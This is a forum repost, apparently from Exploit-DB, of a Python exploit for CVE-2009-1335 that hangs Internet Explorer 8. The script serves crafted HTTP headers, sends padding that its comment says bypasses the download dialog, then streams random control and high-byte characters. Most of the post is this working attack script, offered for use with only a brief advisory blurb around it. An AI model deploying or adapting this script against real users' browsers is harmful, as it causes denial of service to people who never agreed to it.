Exploit Microsoft Internet Explorer 8 - File Download Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32902
Проверка EDB
  1. Пройдено
Автор
NAM NGUYEN
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2009-1335
Дата публикации
2009-04-11
Код:
source: https://www.securityfocus.com/bid/34478/info

Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.

Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions. 

#/usr/bin/env python
import sys
import random

CHAR_SET = [chr(x) for x in range(0x20)]
CHAR_SET += [chr(x) for x in range(128, 256)]

def send_file():
      l = 800000 + 4096
      print "Content-Type: text/plain"
      print "Content-Length: %d" % l
      print "Cache-Control: no-cache, no-store, must-revalidate"
      # this is not standardized, but use it anyway
      print "Pragma: no-cache"
      print ""
      # bypass IE download dialog
      sys.stdout.write("a" * 4096)
      # print junks
      for i in xrange(l):
              sys.stdout.write(random.choice(CHAR_SET))
      sys.exit()

send_file()
 
Источник
www.exploit-db.com

Похожие темы